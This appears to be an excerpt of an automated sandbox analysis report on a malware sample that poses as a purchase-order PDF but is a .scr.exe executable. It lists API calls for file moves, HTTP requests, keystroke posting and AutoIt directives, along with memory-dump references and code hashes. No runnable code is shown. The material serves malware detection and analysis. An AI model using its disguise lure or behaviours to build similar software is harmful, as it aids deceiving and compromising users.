                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                                                                                                                                                                                                            • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,?,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,004A8E80,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 978794511-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                                                                                                                                                                                            • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                                                                                                                                                                                                            • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
APIs
  • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
  • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
  • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
• PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
• Sleep.KERNEL32(00000000), ref: 00445D70
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
• Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
• Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
• Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
• Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
• Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
APIs
Strings
Similarity
• API ID: AddressProc_malloc$_strcat_strlen
• String ID: AU3_FreeVar
• API String ID: 2184576858-771828931
• Opcode ID: 04cda4dcaee16d464bdfc589b53969bd54b57a6706cbcc76e367f128a167b500
• Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
• Opcode Fuzzy Hash: 04cda4dcaee16d464bdfc589b53969bd54b57a6706cbcc76e367f128a167b500
• Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
• DestroyWindow.USER32(?), ref: 0042A751
• UnregisterHotKey.USER32(?), ref: 0042A778
• FreeLibrary.KERNEL32(?), ref: 0042A822
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
Strings
Similarity
• API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
• String ID: close all
• API String ID: 4174999648-3243417748
• Opcode ID: 1faab716d740b0a97759489cfcf3fe87684f2c70f03003e2ca00eb1c9fd5b387
• Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
• Opcode Fuzzy Hash: 1faab716d740b0a97759489cfcf3fe87684f2c70f03003e2ca00eb1c9fd5b387
• Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
• InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
• HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1291720006-3916222277
                                                                                                                                                                                                                                                                                                            • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                                                                                                                                                                                                            • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ErrorLastselect
• String ID: HH
• API String ID: 215497628-2761332787
• Opcode ID: d15483ea6440eafbe7487eb2e68bacdbc24e9ec8681ed56f1cdb501d55a74ba2
• Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
• Opcode Fuzzy Hash: d15483ea6440eafbe7487eb2e68bacdbc24e9ec8681ed56f1cdb501d55a74ba2
• Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: __snwprintf__wcsicoll_wcscpy
• String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
• API String ID: 1729044348-3708979750
• Opcode ID: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
• Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
• Opcode Fuzzy Hash: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
• Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
APIs
  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,?,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,004A8E80,C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe,0040F3D2), ref: 0040FFCA
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
• MoveFileW.KERNEL32(?,?), ref: 0044BC38
• _wcscat.LIBCMT ref: 0044BCAA
• _wcslen.LIBCMT ref: 0044BCB7
• _wcslen.LIBCMT ref: 0044BCCB
• SHFileOperationW.SHELL32 ref: 0044BD16
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \*.*
• API String ID: 2326526234-1173974218
                                                                                                                                                                                                                                                                                                            • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 004366DD
                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0043670F
                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                                                                                                                                                                                                                                                            • _wcsrchr.LIBCMT ref: 0043674C
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                                                                                                                                                                                            • String ID: \
                                                                                                                                                                                                                                                                                                            • API String ID: 321622961-2967466578
                                                                                                                                                                                                                                                                                                            • Opcode ID: 89fee19c6af83de540ba808c0374432e2a46b6c40b39e15789b2a1855c2cb0dc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89fee19c6af83de540ba808c0374432e2a46b6c40b39e15789b2a1855c2cb0dc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wcsnicmp
                                                                                                                                                                                                                                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                                                                                                                                                            • API String ID: 1038674560-2734436370
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4ab3b81ba6b37d495ecac8d13b9aeab9278ef9f555502ff5b318f61fd8e6d58e
                                                                                                                                                                                                                                                                                                            • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ab3b81ba6b37d495ecac8d13b9aeab9278ef9f555502ff5b318f61fd8e6d58e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0044157D
                                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00441585
                                                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
• Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
• Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
• Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
APIs
• ___set_flsgetvalue.LIBCMT ref: 004140E1
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 004140EC
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004140FF
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
• ExitThread.KERNEL32 ref: 0041410F
• GetCurrentThreadId.KERNEL32 ref: 00414115
• __freefls@4.LIBCMT ref: 00414135
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
